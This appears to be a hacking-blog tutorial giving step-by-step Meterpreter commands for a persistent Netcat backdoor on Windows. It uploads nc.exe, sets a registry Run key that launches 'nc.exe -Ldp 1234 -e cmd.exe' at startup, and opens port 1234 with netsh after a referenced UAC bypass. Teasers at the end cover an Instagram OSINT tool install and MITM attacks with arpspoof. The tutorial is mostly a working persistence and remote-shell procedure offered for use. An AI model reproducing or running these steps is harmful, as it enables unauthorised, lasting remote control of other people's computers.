Persistent NETCAT Backdoor - Registry Run Keys

The Windows Registry Is A Magical Place Where, With Just A Few Keystrokes, You Can Render A System Virtually Unusable. So, Be Very Careful On This Next Section As "Mistakes Can Be Painful".

We Will Be Installing A Netcat Backdoor.

Note: You Can "Download Netcat" From Here:-
    https://eternallybored.org/misc/netcat/netcat-win32-1.11.zip
or   https://mega.nz/file/3VQwlBbI#6jl1aApYju0lzAuadmOiQArSDUrb3x5rGu-rpjshagQ     
This Includes Changes To The System Registry And Firewall.

Step 1:- Create Payload Get "System Level Privilege".

Note: If You Don't Know Then Go To This Link And Do Same Step Of "UAC Bypass" To Get System Level Privilege.

Step 2:- First, We Must Upload A Copy Of Netcat To The "Remote System".

 upload /root/Downloads/netcat/nc.exe


Step 3:- Afterwards, We Work With The Registry To Have Netcat Execute On Start Up And Listen On Port 1234. We Do This By "Editing The Key".



 ‘HKEY_LOCAL_MACHINE\software\microsoft\windowscurrentversion’.
    
reg enumkey -k HKEY_LOCAL_MACHINE\\software\\microsoft\\windows\\currentversion


Step 4:- Write Below Command.

   reg setval -k HKEY_LOCAL_MACHINE\\SOFTWARE\\microsoft\\windows\\currentversion -v nc -d 'C:\windows\system32\nc.exe -Ldp 1234 -e cmd.exe'

Step 5:- Write Below Command.

     reg queryval -k  HKEY_LOCAL_MACHINE\\software\\microsoft\\windows\\currentversion -v nc




Next, We Need To Alter The System To Allow Remote Connections Through The Firewall To Our Netcat Backdoor. 
We Open Up An Interactive Command Prompt And Use The Netsh Command To Make The Changes As It Is Far Less Error-Prone Than Altering The Registry Directly. 
Plus, The Process Shown Should Work Across More Versions Of Windows, As Registry Locations And Functions Are Highly Version And Patch Level Dependent.

Step 6:- Write Below Command.

    execute -f cmd -i
 



Step 7:- Write Below Command.

    netsh firewall show opmode



Step 8:- We Open Up Port 1234 In The "Firewall And Double-Check" That It Was Set Properly.

    netsh firewall add portopening TCP 1234 "Service Firewall" ENABLE ALL

Step 9:- Write Below Command.
 
   netsh firewall show portopening

So With That Being Completed, We Will Reboot The Remote System And Test Out The Netcat Shell.


 Step 10:- Write Below Command.
                dir


Wonderful! In A Real World Situation, We Would Not Be Using Such A Simple Backdoor As This, With No Authentication Or Encryption, However The Principles Of This Process Remain The Same For Other Changes To The System, And Other Sorts Of Programs One Might Want To Execute On Start Up.

Comments

Post a Comment

Popular posts from this blog

OSINT Tool in Termux

Image
The Instagram OSINT Tool gets a range of information from an Instagram account that you normally wouldn't be able to get from just looking at their profile The information includes: [ profile ] : user id, followers / following, number of uploads, profile img URL, business enum, external URL, joined Recently, etc [ tags & mentions ] : most used hashtags and mentioned accounts [ email ] : if any email is used any where it'll be displayed [ posts ] : accessability caption, location, timestamp, caption, picture url, etc ( yet not working correctly with posts instagram marks as 'sensitive cotent' ) How To Install apt update && upgrade -y Pkg install git pkg install python3 git clone https://github.com/th3unkn0n/osi.ig.git && cd osi.ig python3 -m pip install -r requirements.txt Usage python3 main.py -u username
Read more

Active Directory Ransomware Attacks

Image
    Organizations worldwide use Active Directory (AD) as their primary identity service , which makes it a top target for ransomware attacks . This article explains how adversaries exploit Active Directory during ransomware attacks and provides strategies and tools for defending against this modern menace. The two phases of a ransomware attack A common misconception about ransomware attacks is that they are quick: Someone opens an infected email attachment or inserts an infected USB device , and within minutes data across the network is encrypted and a ransom demand is displayed on every screen . The reality is quite different. Ransomware attacks today tend to be quite sophisticated and methodical . To encrypt as much sensitive information as possible and therefore maximize the chances of receiving a high payout , attackers proceed in two phases: Find an entry point — The first step is to gain a foothold in the victim organization ’s network . One common strategy is to comp...
Read more

How to perform a Man-in-the-middle (MITM) attack with Kali Linux

Image
Learn how to perform a Man in the middle attack with arpspoof, driftnet and urlsnarf in Kali Linux In this article, you will learn how to perform a MITM attack to a device that's connected in the same Wi-Fi networks as yours. Requirements This article assumes that you know what is a network interface and you know to how to work with Kali Linux and the command line. Before starting, you will need to know the name of the Network interface (installed on your machine) and the IP of the router that provides Wi-Fi access. The Network Interface Name can be easily obtained as running the ifconfig command on a terminal, then from the list copy the name of the interface that you want to use. The IP of the router can be obtained executing ip route show on a terminal and a message like "default via [This is the router IP]". From the victim, you will only need the IP (the user needs to be connected to the network provided by the router). The process of obtaining the device IP of the v...
Read more